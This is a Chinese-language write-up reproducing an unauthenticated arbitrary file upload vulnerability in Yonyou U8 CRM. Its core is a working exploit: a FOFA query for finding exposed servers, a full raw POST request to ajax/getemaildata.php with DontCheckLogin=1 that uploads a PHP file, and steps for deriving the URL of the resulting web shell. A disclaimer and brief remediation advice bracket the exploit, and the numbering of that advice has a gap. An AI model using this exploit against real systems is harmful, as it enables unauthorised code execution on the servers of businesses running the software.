文章目录
- 用友U8 CRM客户关系管理任意文件上传漏洞复现
- 0x01 前言
- 0x02 漏洞描述
- 0x03 影响平台
- 0x04 漏洞环境
- 0x05 漏洞复现
- 1.访问漏洞环境
- 2.构造POC
- 3.复现
- 4.访问shell地址
- 0x06 整改建议
用友U8 CRM客户关系管理任意文件上传漏洞复现
0x01 前言
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!
0x02 漏洞描述
用友U8客户关系管理全面解决方案是基于中国企业最佳营销管理实践,更符合中国企业营销管理特点,客户关系管理的整合营销平台。产品融合数年来积累的知识、方法和经验,目标是帮助企业有效获取商机、提升营销能力。
用友U8 crm客户关系管理 ajax/getemaildata.php任意文件上传漏洞。
0x03 影响平台
用友U8 CRM
0x04 漏洞环境
fofa:body=“用友U8CRM”
0x05 漏洞复现
1.访问漏洞环境
2.构造POC
POC (POST)
POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 205
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykS5RKgl8t3nwInMQ
Accept-Encoding: gzip, deflate------WebKitFormBoundarykS5RKgl8t3nwInMQ
Content-Disposition: form-data; name="file"; filename="ceshi.php "
Content-Type: text/plain<?php echo md5(123456);?>------WebKitFormBoundarykS5RKgl8t3nwInMQ
3.复现
发现成功执行,响应成功!!!
4.访问shell地址
上传之后返回的路径为:上传之后返回的路径为:D:\U8SOFT\turbocrm70\code\www\tmpfile\mht1312.tmp.mht
文件名称为:mht1312.tmp.mht,直接访问这个文件不解析,需要访问另一个文件
上传之后会在目录下生成两个文件tmp.mht和tmp.php文件
访问的解析文件格式为upd*.tmp.php**
星号部分为返回的文件名的十六进制减去一。
例如:
1312——>31333132(十六进制),31333131(十六进制减一)——>1311
最终的shell文件名为:http://ip:port/tmpfile/upd1311.tmp.php
0x06 整改建议
1.设置权限限制,禁止上传目录的执行权限
2.严格限制可上传的文件类型
3.严格限制可上传的文件路径
4.文件扩展名服务端白名单校验
5文件内容服务端校验
6.上传文件重命名
9.隐藏上传文件路径